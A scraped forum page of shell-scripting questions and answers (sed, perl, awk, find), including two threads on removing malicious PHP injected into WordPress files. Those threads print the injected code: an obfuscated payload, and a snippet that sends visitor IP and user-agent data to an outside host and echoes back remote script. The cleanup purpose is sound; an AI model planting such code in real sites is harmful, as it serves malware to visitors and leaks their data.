Replacing large string of text in Linux - linux

I have several 1000 WP files that were injected with string such as the following:
I know I can do a replace with something like this:
find . -type f -exec sed -i 's/foo/bar/g' {} +
But I am having a problem getting the large string to be taken correctly. All the " and ' cause the string to jump out of my CLI.
Below is a sample string:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\1162]y4c##j0#67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1pde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5cujojRk3%x5c%x7860{666~7878Bsfuvso!sboepn)%x5c%x7825epnbss-x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%xp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uc%x7825Z<#opo#>b%x5c%x7<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x70QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x!Ydrr)%x5c%x7825r%x5c%x%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x560msvd}+;!>!}%x5c%x7827;!>tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2e:4e, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>
EXAMPLE of what I tried:
perl -pi -e 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $rlapmcvfunction fjfgg($n){%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782c%x7824*!|!%x5c%x7824-...x2a\57\x20"; $qenzappyva=substr($rlapmcvoxs,(48535-38422),(59-47)); $qenzappyva($rrzeotjace, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>//g' /home/......../content-grid.php
-bash: !: event not found

If the match is identical and on a separate line you can use comm
comm -23 source subtract
where subtract is the file with the contents to be removed from the source file. It's not an in place replacement so you have to create a temp file and overwrite the source after making sure it does what you need.

If you don't care about the extra newline, the simple approach using sed would be:
find . -type f -exec sed -i 's/.*\\x61\\156\\x75\\156\\x61.*$//g' {} +
sed can also handle the newline, but that is a little more complex.

Related

sed- insert text before and after pattern

As a part of optimisation, I am trying to replace all Java files containing the string:
logger.trace("some trace message");
With:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
N.B. Some trace message is not the exact string but an example. This string will be different for every instance.
I am using a bash script and sed but can't quite get the command right.
I have tried this in a bash script to insert before:
traceStmt="if (logger.isTraceEnabled())
{
"
find . -type f -name '*.java' | xargs sed "s?\(logger\.trace\)\(.*\)?\1${traceStmt}?g"
I have also tried different variants but with no success.
Try the following using GNU sed:
$ cat file1.java
1
2
logger.trace("some trace message");
4
5
$ find . -type f -name '*.java' | xargs sed 's?\(logger\.trace\)\(.*\)?if (logger.isTraceEnabled())\n{\n \1\2\n}?'
1
2
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
4
5
$
If you would like to prevent adding new line endings
sed will add \n to the end of files that do not end in \n)
You could try like:
perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' file.java
notice the ending /e
The evaluation modifier s///e wraps an eval{...} around the replacement string and the evaluated result is substituted for the matched substring. Some examples:
In this case from your example, the file input contains:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
If have multiple files you could try:
find . -type f -name '*.java' -exec perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' {} +

Removing a prefix from files recursively in ssh

I have a load of folders of images (a lot!) and some of the thumbnails have a 'tn' prefix, while others don't, so in order to be able to write a gallery for all, I'm trying to remove the 'tn' from the beginning of the files that have it recursively in the entire directory.
So, an offending thumbnail would have the files :
tngal001-001.jpg
tngal001-002.jpg
tngal001-003.jpg
etc...
and I need them to be :
gal001-001.jpg
gal001-002.jpg
gal001-003.jpg
or even better still... if I could get the whole tngal001- off, that'd be amazing, so, in the directory gallery I have:
gal001/thumbnails/tngal001-001.jpg
gal001/thumbnails/tngal001-002.jpg
gal001/thumbnails/tngal001-003.jpg
etc...
gal002/thumbnails/tngal002-001.jpg
gal002/thumbnails/tngal002-002.jpg
gal002/thumbnails/tngal002-003.jpg
etc...
gal003/thumbnails/tngal003-001.jpg
gal003/thumbnails/tngal003-002.jpg
gal003/thumbnails/tngal003-003.jpg
etc...
and I'd prefer to have:
gal001/thumbnails/001.jpg
gal001/thumbnails/002.jpg
gal001/thumbnails/003.jpg
etc...
gal002/thumbnails/001.jpg
gal002/thumbnails/002.jpg
gal002/thumbnails/003.jpg
etc...
gal003/thumbnails/001.jpg
gal003/thumbnails/002.jpg
gal003/thumbnails/003.jpg
etc...
I have tried find . -type f -name "tn*" -exec sh -c 'for f; do mv "$f" "{f#tn}"; done' find sh {} +
and find . -type f -exec sh -c 'for file in tn*; do mv "$file" "${file#tn}"; done' findsh {} +
but I'm not getting it quite right. I just want to understand how to strip off the letters/rename recursively, as I'm just getting my head around this stuff. All the other questions I have found seem to be talking about stripping out characters from file names and all the ascii characters and escaping spaces etc are confusing me. I would appreciate it if someone could explain it in plain(ish) english. I'm not stupid, but I am a newbie to linux! I know it's all logical once I understand what's happening.
Thanks in advance, Kirsty
find . -type f -name "tn*" -exec sh -c '
for f; do
fname=${f##*/}
mv -i -- "$f" "${f%/*}/${fname#tn*-}"
done
' sh {} +
You need to split "$f" into the parent path and filename before you start to remove the prefix from the filename. And you forgot to add a $ in your parameter expansion (${f#tn}).
${f##*/} removes the longest prefix */ and leaves the filename, e.g.
gal001/thumbnails/tngal001-001.jpg -> tngal001-001.jpg
(the same result as basename "$f")
${f%/*} removes the shortest suffix /* and leaves the parent path, e.g.
gal001/thumbnails/tngal001-001.jpg -> gal001/thumbnails
(the same result as dirname "$f")
${fname#tn*-} removes the shortest prefix tn*- from the filename, e.g.
tngal001-001.jpg -> 001.jpg
I added the -i option to prompt to overwrite an already existing file.
You can loop over all the folders and files in your gallery and then rename them as following.
Assuming you have your folder structure as
gallery/
gallery/gal001
gallery/gal002
gallery/gal003
...
gallery/gal001/thumbnails/
gallery/gal002/thumbnails/
gallery/gal003/thumbnails/
...
gallery/gal001/thumbnails/tngal001-001.jpg
gallery/gal001/thumbnails/tngal001-002.jpg
gallery/gal001/thumbnails/tngal001-002.jpg
Move to your gallery using cd gallery then run the following code
for j in *;
do
cd $j/thumbnails;
for i in *;
do
echo "Renaming $j/thumbnails/$i --> $(echo $i|sed "s/tn$j-//1")";
mv -i $i $(echo $i|sed "s/tn$j-//1");
done
cd ../..;
done
Explanation
for j in *;
loops over all the folders in gallery ie j contains gal001, gal002, gal003, etc.
cd $j/thumbnails;
moves inside 'gal001/thumbnails' direcotry.
for i in *; do
loops over all the files in the directory gal001/thumbnails and name of the file is contained in i.
echo "Renaming $j/thumbnails/$i --> $(echo $i|sed "s/tn$j-//1")"
Prints the file name and to which it is being renamed to. (Remove it if you don't want verbose).
mv $i $(echo $i|sed "s/tn$j-//1"); done
mv -i $i newname Renames $i (value of current file in loop). -i flag to prompt if the file name after rename already exist.
sed is stream editor, takes the filename by piping $i into sed,
"s/previous/new/1" replaces first occurence of previous value with new value in the stream. Here, replaces value of tn + j (which is name of directory gal001) i.e. tngal001- with "null string" (nothing between //).
cd ../.. to move back to gallery.

Searching multiple files for list of words in a text file

I need to go through a huge amount of text files and list the ones that contains ALL of the words listed in another text file.
I need to list only the files containing all of the words. It does not have to be in any specific order. I've tried to use a variety of grep commands, but it only outputs the files containing any of the words, not all of them. It would be ideal to use the txt file containing the list of words as a search for grep.
Expected output is a list of just the files that succeed in the search (files that contains all the words from the "query" text file)
Tried
grep -Ffw word_list.txt /*.fas
find . -exec grep "word_list.txt" '{}' \; -print
I've found solutions using a number of pipes like
awk "/word1/&&/word2/&&/word3/" ./*.txt
find . -path '*.txt' -prune -o -type f -exec gawk '/word1/{a=1}/word2/{b=1}/word3/{c=1}END{ if (a && b && c) print FILENAME }' {} \;
But I have a huge list of words and would be impractical.
Thank you.
Given sample files
file1.txt
word1
word2
word4
word5
file2.txt
word1
word2
word3
word4
file3.txt
word2
word3
word4
file4.txt
word0
word1
word2
word3
word4
file5.txt
word0
word1
word2
word3
word4
word5
This old-fashioned awk/shell code
#!/bin/bash
wordList="$1"
shift
awk -v wdListFile="$wordList" '
BEGIN{
dbg=0
while(getline < wdListFile > 0 ) {
words[$0]=$0
flags[$0]=0
numFlags++
}
}
{
if (dbg) { print "#dbg: myFile=" myFile " FILENAME=" FILENAME }
if (myFile != FILENAME) {
# a minor cost of extra reset on the first itteration in the run
if (dbg) { print "#dbg: inside flags reset" }
for (flg in flags) {
flags[flg]=0
}
}
for (i=1; i<=NF; i++) {
if (dbg) { print "#dbg: $i="$i }
if ($i in words) {
flags[$i]++
}
}
matchedCnt=0
for (f in flags) {
if (dbg) { print "#dbg: flags["f"]="flags[f] }
if (flags[f] > 0 ) {
matchedCnt++
if (dbg) { print "#dbg: incremeted matchedCnt to " matchedCnt}
}
}
if (dbg) {print "#dbg: Testing matchedCnt=" matchedCnt "==numFlags=" numFlags}
if (matchedCnt == numFlags) {
if (dbg) { print "All words found in "FILENAME "matchedCnt=" matchedCnt " numFlags=" numFlags}
print FILENAME
nextfile
}
myFile=FILENAME
if (dbg) { print "#dbg: myFile NOW=" myFile }
}' $#
Run from the command line as
./genGrep.sh wd.lst file*.txt
Produces the following output
file2.txt
file4.txt
file5.txt
One time only, make the script executable with
chmod 755 ./genGrep.sh
I would recommend making a copy of this file with dbg in the name, then take the original copy and delete all lines with dbg. This way you'll have a dbg version if you need it, but the dbg lines add an extra ~20% to reading the code.
Note that you can switch all dbging on by setting dbg=1 OR you can turn on individual lines by adding a ! char, i.e. if (! dbg) { ...}.
If for some reason you're running on really old Unix hardware, the nextfile command may not work. See if your system has gawk available, or get it installed.
I think there is an trick to getting nextfile behavior if it's not builtin, but I don't want to spend time researching that now.
Note that the use of the flags[] array, matchedCnt variable and the builtin awk function nextfile is designed to stop searching in a file once all words have been found.
You could also add a parameter to say "if n percent match, then print file name", but that comes with a consulting rate attached.
If you don't understand the stripped down awk code (removing the dbg sections), please work your way thur Grymoire's Awk Tutorial before asking questions.
Managing thousands of files (as you indicate) is a separate problem. But to get things going, I would call genGrep.sh wd.lst A* ; genGrep.sh wd.lst B*; ... and hope that works. The problem is that the command line has a limit of chars that can be processed at once in filename lists. So if A* expands to 1 billion chars, that you have to find a way to break up line size to something that the shell can process.
Typically, this is solved with xargs, so
find /path/to/files -name 'file*.txt' | xargs -I {} ./genGrep.sh wd.lst {}
Will find all the files that you specify by wildcard as demonstrated, from 1 or more /path/to/file that you list as the first argument to find.
All matching files are sent thru the pipe to xargs, which reads all files from list that one command invocation can process, and continues looping (not visible to you), until all files have been processed.
There are extra options to xargs that allow having multiple copies of ./genGrep.sh running, if you have the extra "cores" available on your computer. I don't want to get to deep into that, as I don't know if the rest of this is really going to work in your real-world use.
IHTH
It's a little hack as there is no direct way to do AND in grep.. We can using grep -E option to simulate AND.
grep -H -E "word1" *.txt| grep -H -E "word2" *.txt|grep -H -E "word3" *.txt | grep -H -E "word4" *.txt| cut -d: -f1
-H => --with-filename
-E => --extended-regexp
cut -d: -f1 => to print only the file name.
Try something like:
WORD_LIST=file_with_words.txt
FILES_LIST=file_with_files_to_search.txt
RESULT=file_with_files_containing_all_words.txt
# Generate a list of files to search and store as provisional result
# You can use find, ls, or any other way you find useful
find . > ${RESULT}
# Now perform the search for every word
for WORD in $(<${WORD_LIST}); do
# Remove any previous file list
rm -f ${FILES_LIST}
# Set the provisional result as the new starting point
mv ${RESULT} ${FILES_LIST}
# Do a grep on this file list and keep only the files that
# contain this particular word (and all the previous ones)
cat ${FILES_LIST} | xargs grep -l > $RESULT
done
# Clean up temporary files
rm -f ${FILES_LIST}
At this point you should have in $RESULTS the list of files that contain all the words in ${WORD_LIST}.
This operation is costly, as you have to read all the (still) candidate files again and again for every word you check, so try to put the less frequent words in the first place in the ${WORD_LIST} so you will drop as many files as possible from the checking as soon as possible.

Find-and-replace multiple complex lines in Linux

I'm trying to clean up a security breach. I want to find all instances of the offending PHP code on the web directory and remove them. It looks like this:
<?php
#c9806e#
error_reporting(0); ini_set('display_errors',0); $wp_xoy23462 = #$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_xoy23462) && !preg_match ('/bot/i', $wp_xoy23462))){
$wp_xoy0923462="http://"."template"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_xoy23462);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_xoy0923462);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_23462xoy = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_23462xoy,1,3) === 'scr' ){ echo $wp_23462xoy; }
#/c9806e#
?>
<?php
?>
(c9806e is a random alphanumeric string)
I've found lots of resources for using find, sed, and grep to replace simple things. I can probably cobble up something based on all that, but I would not be sure that it works, or that it won't break anything.
Here are the tools I have:
GNU Awk 3.1.7
GNU grep 2.6.3
GNU sed 4.2.1
GNU find 4.4.2
Here's the offending code with escaped characters.
<\?php
#\w+#
error_reporting\(0\); ini_set\('display_errors',0\); $wp_xoy23462 = #$_SERVER\['HTTP_USER_AGENT'\];
if \(\( preg_match \('/Gecko\|MSIE/i', $wp_xoy23462\) && !preg_match \('/bot/i', $wp_xoy23462\)\)\)\{
$wp_xoy0923462="http://"\."template"\."class"\."\.com/class"\."/\?ip="\.$_SERVER\['REMOTE_ADDR'\]\."&referer="\.urlencode\($_SERVER\['HTTP_HOST'\]\)\."&ua="\.urlencode\($wp_xoy23462\);
$ch = curl_init\(\); curl_setopt \($ch, CURLOPT_URL,$wp_xoy0923462\);
curl_setopt \($ch, CURLOPT_TIMEOUT, 6\); curl_setopt\($ch, CURLOPT_RETURNTRANSFER, 1\); $wp_23462xoy = curl_exec \($ch\); curl_close\($ch\);\}
if \( substr\($wp_23462xoy,1,3\) === 'scr' \)\{ echo $wp_23462xoy; \}
#/w+#
\?>
<\?php
\?>
Edit: As it turned out, some of the linebreaks were \r\n instead of \n. (Others were just '\n'.)
sed -n '1! H;1 h
$ {x
: again
\|<?php\n#\([[:alnum:]]\{1,\}\)#\nerror_reporting(0).*#/\1#\n?>\n<\?php\n\n\?>| s///
t again
p
}'
version that seems to work on GNU sed (thanks #leewangzhong)
sed -n '1! H;1 h
$ {x
: again
\|<?php\r*\n#\([[:alnum:]]\{6\}\)#\nerror_reporting(0).*#/\1#\r*\n?>\r*\n<?php\r*\n\r*\n?>| s///
t again
p
}'
Try something like this but it depend really of internal code format (\n, space, ...)
concept:
load all the file in buffer (sed work line by line by default) to allow the \n pattern
1! H;1 h
is used for loading each line at read time (from working buffer) into hold buffer
$ {x
take back x info from hold buffer into working buffer (swap content in fact) when at the last line $, so sed is now working on the full file including \n at end of each line
search and modify (remove) a pattern starting with
if found one, restart the operation (so with a new ID)
if not found (so no more bad code), print the result (cleaned code)
Using Python instead of sed for the replacement.
The regex:
<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>
The regex with comments:
<\?php #Start of PHP code (escape the '?')
\s+ #Match any number of whitespace
#(\w+)#\s+ #Hax header: one or more alphanumeric
#symbols, and use parens to remember this group
error_reporting\(0\) #To be really sure that this isn't innocent code,
#we check for turning off error reporting.
[^#]+ #Match any character until the next #, including
#newlines.
#/\1#\s+ #Hax footer (using \1 to refer to the header code)
\?> #End of the PHP code
[^>]+> #Also catch the dummy <?php ?> that was added:
#match up to the next closing '>'
# $find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out
The Python script:
#Python 2.6
import re
haxpattern = r"<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>"
haxre = re.compile(haxpattern)
#Takes in two file paths
#Prints from the infile to the outfile, with the hax removed
def unhax(input,output):
with open(input) as infile:
with open(output,'w') as outfile:
whole = infile.read() #read the entire file, yes
match = haxre.search(whole)
if not match: #not found
return
#output to file
outfile.write(whole[:match.start()]) #before hax
outfile.write(whole[match.end():]) #after hax
#return the removed portion
return match.group()
def process_and_backup(fname):
backup = fname+'.bak2014';
#move file to backup
import os
os.rename( fname, backup )
try:
#process
print '--',fname,'--'
print unhax(input=backup, output=fname)
except Exception:
#failed, undo move
os.rename( backup, fname)
raise
def main():
import sys
for arg in sys.argv[1:]:
process_and_backup(arg)
if __name__=='__main__':
main()
The command:
find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out
The command, explained:
find #Find,
. #starting in the current folder,
-type f #files only (not directories)
-name "*.php" #which have names with extension .php
-exec grep #and execute grep on each file with these args:
-l #Print file names only (instead of matching lines)
--null #End prints with the NUL char instead of a newline
"wp_xoy0923462" #Look for this string
{} #in this program ("{}" being a placeholder for `find`)
\; #(End of the -exec command
| #Use the output from above as the stdin for this program:
xargs #Read from stdin, and for each string that ends
-0 #with a NUL char (instead of whitespace)
-I fname #replace "fname" with that string (instead of making a list of args)
#in the following command:
python #Run the Python script
unhaxphp.py #with this filename, and pass as argument:
fname #the filename of the .php file to unhax
>> unhax.out #and append stdout to this file instead of the console

Find "string1" and delete between that and "string2"

I'm using command line and sed. I need a command to delete from multiple files recursively.
I have left comments such as:
<!--String 1 -->
Code to delete goes here
<!--String 2 -->
So I need to delete string 1, the text in between and string 2, in all files in the current directory and below.
Would appreciate any help :)
Just use addresses:
sed -e '/<!--String 1 -->/,/<!--String 2 -->/d'
Update: to apply the sed command recursively to files under a path, you can use find:
find /path/to/directory -type f -exec sed -e '/<!--String 1 -->/,/<!--String 2 -->/d' {} \;

Resources